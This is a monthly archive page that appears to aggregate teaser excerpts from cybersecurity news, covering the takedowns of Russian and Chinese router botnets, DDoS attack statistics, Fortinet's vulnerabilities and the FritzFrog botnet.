Monthly Archives: February 2024

That home router botnet the Feds took down? Moscow’s probably going to try again

Non-techies told to master firmware upgrades and firewall rules. For the infosec hardheads: have some IOCs Authorities from eleven nations have delivered a sequel to the January takedown of a botnet run by Russia on compromised Ubiquiti Edge OS routers – in the form of a warning that Russia may try again, so owners of the devices should take precautions.…

More:
That home router botnet the Feds took down? Moscow’s probably going to try again

U.S. authorities disrupt Russian intelligence’s botnet

In January 2024, an operation dismantled a network of hundreds of SOHO routers controlled by GRU Military Unit 26165, also known as APT 28, Sofacy Group, Forest Blizzard, Pawn Storm, Fancy Bear, and Sednit. This network facilitated various crimes, including extensive spearphishing and credential harvesting against entities of interest to the Russian government, such as U.S. and foreign governments, military, and key security and corporate sectors. This botnet was distinct from prior GRU and Russian … More ? The post U.S. authorities disrupt Russian intelligence’s botnet appeared first on Help Net Security .

See more here:
U.S. authorities disrupt Russian intelligence’s botnet

Cybersecurity sectors adjust as DDoS attacks reach new heights

In this Help Net Security video, Andrey Slastenov, Head of Security Department at Gcore, discusses the findings of their latest report that provide insights into the current state of the DDoS protection market and cybersecurity trends. Key highlights from Q3–Q4 2023: The maximum attack power rose from 800 Gbps (1H 2023) to 1.6 Tbps. UDP floods constitute 62% of DDoS attacks. TCP floods and ICMP attacks remain popular at 16% and 12% respectively and SYN, … More ? The post Cybersecurity sectors adjust as DDoS attacks reach new heights appeared first on Help Net Security .

Follow this link:
Cybersecurity sectors adjust as DDoS attacks reach new heights

Feds dismantle Russian GRU botnet built on 1,000-plus home, small biz routers

Beijing, now Moscow.… Who else is hiding in broadband gateways? The US government today said it disrupted a botnet that Russia’s GRU military intelligence unit used for phishing expeditions, spying, credential harvesting, and data theft against American and foreign governments and other strategic targets.…

Read More:
Feds dismantle Russian GRU botnet built on 1,000-plus home, small biz routers

Fortinet’s week to forget: Critical vulns, disclosure screw-ups, and that toothbrush DDoS attack claim

An orchestra of fails for the security vendor We’ve had to write the word “Fortinet” so often lately that we’re considering making a macro just to make our lives a little easier after what the company’s reps will surely agree has been a week sent from hell.…

Taken from:
Fortinet’s week to forget: Critical vulns, disclosure screw-ups, and that toothbrush DDoS attack claim

FBI: Give us warrantless Section 702 snooping powers – or China wins

Never mind the court orders obtained to thwart Volt Typhoon botnet Analysis   The FBI’s latest PR salvo, as it fights to preserve its warrantless snooping powers on Americans via FISA Section 702, is more big talk of cyberattacks by the Chinese government.…

Read More:
FBI: Give us warrantless Section 702 snooping powers – or China wins

DDoS attack power skyrockets to 1.6 Tbps

DDoS attack trends for the second half of 2023 reveal alarming developments in their scale and sophistication, according to Gcore. The maximum attack power rose from 800 Gbps (1H 2023) to 1.6 Tbps. UDP floods continue to dominate, constituting 62% of DDoS attacks. TCP floods and ICMP attacks also remain popular at 16% and 12% of the total, respectively. All other DDoS attack types, including SYN, SYN+ACK flood, and RST Flood, accounted for a mere … More ? The post DDoS attack power skyrockets to 1.6 Tbps appeared first on Help Net Security .

See more here:
DDoS attack power skyrockets to 1.6 Tbps

FritzFrog botnet exploits Log4Shell, PwnKit vulnerabilities

The FritzFrog cryptomining botnet has new potential for growth: a recently analyzed variant of the bot is exploiting the Log4Shell (CVE-2021-44228) and PwnKit (CVE-2021-4034) vulnerabilities for lateral movement and privilege escalation. The FritzFrog botnet The FritzFrog botnet, initially identified in August 2020, is a peer-to-peer (rather than centrally-controlled) botnet powered by malware written in Golang. It targets SSH servers by brute-forcing login credentials, and has managed to compromise thousands of them worldwide. “Each compromised host … More ? The post FritzFrog botnet exploits Log4Shell, PwnKit vulnerabilities appeared first on Help Net Security .

Excerpt from:
FritzFrog botnet exploits Log4Shell, PwnKit vulnerabilities

FBI disrupts Chinese botnet used for targeting US critical infrastructure

The FBI has disrupted the KV botnet, used by People’s Republic of China (PRC) state-sponsored hackers (aka “Volt Typhoon”) to target US-based critical infrastructure organizations. A botnet for probing critical infrastructure organizations The threat actors used the KV botnet malware to hijack hundreds of US-based, privately-owned small office/home office (SOHO) routers and to hide their hacking activity towards “US and other foreign victims”. “The Volt Typhoon malware enabled China to hide, among other things, pre-operational … More ? The post FBI disrupts Chinese botnet used for targeting US critical infrastructure appeared first on Help Net Security .

More here:
FBI disrupts Chinese botnet used for targeting US critical infrastructure